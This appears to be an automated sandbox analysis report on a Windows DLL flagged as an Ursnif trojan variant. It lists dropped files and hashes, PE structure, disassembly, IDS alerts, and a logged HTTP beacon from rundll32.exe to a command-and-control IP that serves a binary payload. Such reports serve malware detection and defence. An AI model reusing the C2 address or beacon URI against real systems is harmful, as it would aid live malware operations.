                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):868
                      Entropy (8bit):5.3308047202087225
                      Encrypted:false
                      SSDEEP:12:xKIR37Lvkmb6KzsWZE2MKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KzdE2MKaM5DqBVKVrdFAMBJTH
                      MD5:AE184BFF32F3C82CDA83A7144041CC02
                      SHA1:EF366BDA7BD2A422BFF17C7DB20654DDF60A9507
                      SHA-256:EB31DBB8E96AB2747B6EA1425C55A681AC498DF8FC584F80075D000304F4B14E
                      SHA-512:91914CF1BD9069C69248288D4B0AFBF21A65DDEA90BFF2E9AAA24ADA08AE11580500A660418168C6DDCAAFF45F8EAE6813BE109C4A20C23ECB890E6DE4BD3439
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                      C:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.0972257160637633
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryexak7Ynqqj2PN5Dlq5J:+RI+ycuZhNyakS6PNnqX
                      MD5:41270E964816EC4C69225C4FC492514E
                      SHA1:EA9457F4CBF230C99D3E4FF885FDE46E4BD45000
                      SHA-256:41C6EE9B67E14F9616F9DD92586532D396E13BFE8F1D4B97C2930FA89ED740F1
                      SHA-512:801BE92E1AE02CB2C71A1C8424A117F128AE761DC04FAD1503622F8AA0C934C9E96E9CD783ADB2060CFA0F3F28AA2E413782C1068AAE2EDF237CE640C70CF4A6
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.x.a.i.b.b.0.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.x.a.i.b.b.0.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                      C:\Users\user\AppData\Local\Temp\RES109F.tmp

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                      Category:dropped
                      Size (bytes):1332
                      Entropy (8bit):4.000171492218837
                      Encrypted:false
                      SSDEEP:24:HPizW9NProXxUuHjhKdNII+ycuZhNyoakST9PNnq92d:lProXCutKdu1ulna3rq9G
                      MD5:D782BF3D7A8FDEB2AD18B0604344ECE8
                      SHA1:424D88E90F7ECD6BF89F3DB4F71881A007BFC402
                      SHA-256:5CF40AEAD24C13B102AD673AA371346B32E26D5BDF3D279B706C1F18B5AA15FB
                      SHA-512:6C2507E2313D03B691F0826C157C98BCE9F9C0ADFD029D0E5446CBB5E7DD6724D765AAF34426F5E53B58FEB35E192AC725578825A51E3AE2E16AF3C30E863F9C
                      Malicious:false
                      Preview:L...'.sb.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP...................j..........SI...........5.......C:\Users\user\AppData\Local\Temp\RES109F.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.t.b.3.q.i.q.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                      C:\Users\user\AppData\Local\Temp\RES37BE.tmp

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                      Category:dropped
                      Size (bytes):1332
                      Entropy (8bit):3.9829744790376203
                      Encrypted:false
                      SSDEEP:24:HhizW9N7izUuHYFhKdNII+ycuZhNyakS6PNnq92d:TezUu4zKdu1ulya32q9G
                      MD5:EE9EDF850E8759E45C86B471C8A75C98
                      SHA1:450268A4ED02C66CD38EAB0754C27752A558A0B2
                      SHA-256:9377B7E127BD8E34E1182E164391BFF0EC2E55A1037FDED981D8C489251A0B7D
                      SHA-512:EF6F71F1E7454FE4AC2A7A34AEC2672DF8AA4F980B0116DA82E1D2D611899FBB9894D0CC59F4F37B75DD418F42C20DED9BDE9B359491AD7DB6EA9CD4804353EB
                      Malicious:false
                      Preview:L...1.sb.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP..................A'..H..Li"\O.QN..........5.......C:\Users\user\AppData\Local\Temp\RES37BE.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.x.a.i.b.b.0.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_magqr2lp.csh.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3nzoxvm.isc.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      Static File Info

                      General

                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.238626608026645
                      TrID:
                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                      • Generic Win/DOS Executable (2004/3) 0.20%
                      • DOS Executable Generic (2002/1) 0.20%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:tIJVb0BvkI.dll
                      File size:442368
                      MD5:f28f39ada498d66c378fd59227e0f215
                      SHA1:1c9c0584ad51f5be3f16b334d758c88b8cdb7b38
                      SHA256:0a66e8376fc6d9283e500c6e774dc0a109656fd457a0ce7dbf40419bc8d50936
                      SHA512:33e4035a35c204da87d5c5935dcc81020101cfb9001a1f08c6fe5c374d1bfaa888783c7d735d43de483d5b6235e883e797e0855bed548ff4aa8dbab1b8addf1b
                      SSDEEP:6144:rFpWDfyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:rFpoFlJqYhiVDwGU8OqaX1WW3zNg7
                      TLSH:5594F14977A11DBBEC0807761CF8C52B9B66BE2CA23A31DEA6683CFF7E175511048706
                      File Content Preview:MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5......

                      File Icon

                      Icon Hash:9068eccc64f6e2ad

                      Static PE Info

                      General

                      Entrypoint:0x401430
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:0bedc9af0ed7cf2ba33cf662a24d448e

                      Entrypoint Preview

                      Instruction
                      push ebp
                      mov ebp, esp
                      add ecx, FFFFFFFFh
                      call 00007F191498005Ch
                      pop eax
                      pop eax
                      mov dword ptr [00414544h], eax
                      mov edx, dword ptr [00414660h]
                      sub edx, 00005289h
                      call edx
                      ret
                      int3
                      push esi
                      mov eax, ebx
                      mov dword ptr [00414540h], eax
                      pop dword ptr [00414538h]
                      mov dword ptr [00414548h], ebp
                      mov dword ptr [0041453Ch], edi
                      sub dword ptr [00414548h], FFFFFFFCh
                      loop 00007F1914980005h
                      mov dword ptr [ebp+00h], eax
                      nop
                      pushfd
                      dec esp
                      mov bh, byte ptr [edx+20858137h]
                      inc edi
                      outsb
                      popad
                      adc bh, byte ptr [ebx-737236FDh]
                      rcr byte ptr [ebp-09h], 0000006Eh
                      xor dword ptr [edi+2C9A727Dh], edx
                      push edi
                      and eax, 921D5B11h
                      push ds
                      cmc
                      cdq
                      jmp 00007F19149800B1h
                      pop ebx
                      xor dword ptr [edx+72h], edi
                      ficom dword ptr [ecx+335A9032h]
                      jnp 00007F1914980087h
                      mov bl, 02h
                      ret
                      xchg eax, ebp
                      mov al, byte ptr [61B7C6D2h]
                      jnc 00007F191498002Fh
                      mov edx, 52F2559Ch
                      sti
                      sbb dword ptr [ecx+04h], ebp
                      pop ebx
                      inc esp
                      inc esi
                      dec edi
                      fsubr dword ptr [ebx]
                      cmovne ecx, eax
                      in al, D3h
                      jnl 00007F1914980048h
                      xchg eax, esi
                      xchg eax, esi
                      inc eax
                      pop es
                      cmpsd
                      pop edi
                      das
                      and byte ptr [esi-7Ch], bh
                      pop ecx
                      je 00007F1914980024h
                      pop esp
                      jl 00007F19149800BEh
                      xor al, byte ptr [esi+2Ch]
                      out dx, al
                      mov edi, F721E51Fh
                      pop esi
                      or dword ptr [edi+35h], ecx
                      scasb
                      rcl byte ptr [esi+7Ch], 00000040h
                      popfd
                      int3

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xdc180x8c.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x9f28.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000xf0c.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0xd0b00x38.rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0xd0000xb0.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x10000x1.text
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000xb7100xc000False0.0736897786458data1.02203160805IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rdata0xd0000x10730x2000False0.180541992188data3.71589026365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0xf0000x79d00x6000False0.373697916667data6.02717783396IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .crt0x170000x1dc8e0x1e000False0.988427734375data7.9815287954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .erloc0x350000x2ca4f0x2d000False0.988259548611data7.98122243943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .rsrc0x620000x9f280xa000False0.602783203125data6.51663069246IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x6c0000x132e0x2000False0.219360351562data3.73577949218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_BITMAP0x623600x666dataEnglishUnited States
                      RT_ICON0x629c80x485dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                      RT_ICON0x672280x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544EnglishUnited States
                      RT_ICON0x697d00xea8dataEnglishUnited States
                      RT_ICON0x6a6780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                      RT_ICON0x6af200x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                      RT_DIALOG0x6b4880xb4dataEnglishUnited States
                      RT_DIALOG0x6b5400x120dataEnglishUnited States
                      RT_DIALOG0x6b6600x158dataEnglishUnited States
                      RT_DIALOG0x6b7b80x202dataEnglishUnited States
                      RT_DIALOG0x6b9c00xf8dataEnglishUnited States
                      RT_DIALOG0x6bab80xa0dataEnglishUnited States
                      RT_DIALOG0x6bb580xeedataEnglishUnited States
                      RT_GROUP_ICON0x6bc480x4cdataEnglishUnited States
                      RT_VERSION0x6bc980x290MS Windows COFF PA-RISC object fileEnglishUnited States

                      Imports

                      DLLImport
                      KERNEL32.dllEraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak
                      OLEAUT32.dllGetRecordInfoFromTypeInfo, LoadTypeLibEx
                      USER32.dllDefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo
                      GDI32.dllExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment
                      ADVAPI32.dllEnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA
                      msvcrt.dllstrcoll, fgetwc, srand

                      Version Infos

                      DescriptionData
                      LegalCopyright A Company. All rights reserved.
                      InternalName
                      FileVersion1.0.0.0
                      CompanyNameA Company
                      ProductName
                      ProductVersion1.0.0.0
                      FileDescription
                      OriginalFilenamemyfile.exe
                      Translation0x0409 0x04b0

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      05/04/22-16:27:52.293372 05/04/22-16:27:52.293372TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4973880192.168.2.513.107.42.16
                      05/04/22-16:28:12.405919 05/04/22-16:28:12.405919TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975880192.168.2.5185.189.151.28
                      05/04/22-16:28:12.829578 05/04/22-16:28:12.829578TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975880192.168.2.5185.189.151.28

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 4, 2022 16:28:12.382318974 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.405189991 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.405378103 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.405919075 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.428312063 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.702059031 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.702090979 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.702105045 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.702121019 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.702136993 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.702148914 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.702167034 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.702183008 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.702203035 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.702209949 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.702255011 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.702266932 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.702269077 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.702271938 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.702327967 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.702478886 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.702497005 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.702508926 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.702523947 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.702532053 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.702567101 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.702583075 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.724806070 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.724833012 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.724847078 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.724864006 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.724880934 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.724905014 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725003004 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.725048065 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.725060940 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725080967 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725092888 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725120068 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.725162983 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.725205898 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725224972 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725238085 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725264072 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.725292921 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.725359917 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725378990 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725403070 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725414038 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.725431919 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.725497961 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725514889 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725526094 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725553036 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.725569963 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.725687027 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725738049 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725744009 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.725750923 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725786924 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.725850105 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725867987 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725879908 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.725903034 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.725924969 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.725980997 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.726032019 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.726035118 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.726043940 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.726079941 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.726136923 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.726154089 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.726165056 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.726188898 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.726208925 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.747716904 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.747744083 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.747756958 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.747775078 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.747792006 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.747803926 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.747845888 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.747883081 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.747888088 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.747894049 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.747908115 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.747920036 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.747967005 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.747973919 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.747977018 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.747989893 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.748003006 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.748045921 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.748080015 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.748193979 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.748214006 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.748224974 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.748243093 CEST8049758185.189.151.28192.168.2.5
                      May 4, 2022 16:28:12.748244047 CEST4975880192.168.2.5185.189.151.28
                      May 4, 2022 16:28:12.748267889 CEST4975880192.168.2.5185.189.151.28

                      HTTP Request Dependency Graph

                      • 185.189.151.28

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.549758185.189.151.2880C:\Windows\SysWOW64\rundll32.exe
                      TimestampkBytes transferredDirectionData
                      May 4, 2022 16:28:12.405919075 CEST500OUTGET /drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzxPdftfrl/rMm2EBrJhjkbJ6O/93dARdUH_2FoHr_2FV/0rrTpy9pc/1HdKJKRhTt7WBB4IQK6y/YM407RHM4U2q_2BMJQz/BPrYtABTFqi6nvzwRvIVUe/ZccTd3lUnONRt/36Ya8mGx/TeFUFTZ_2BUkjcjLP_2BV5Q/RmDIE1kWYj/OUKtn8nbT_2FNqVm2/qgQV8CVfL5vg/g3ZAMbEOx9s/O0o9X0KU42gffO/GcaP_2Fr_/2BV4K.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 185.189.151.28
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      May 4, 2022 16:28:12.702059031 CEST502INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Wed, 04 May 2022 14:28:12 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 186001
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="62728d7ca6803.bin"
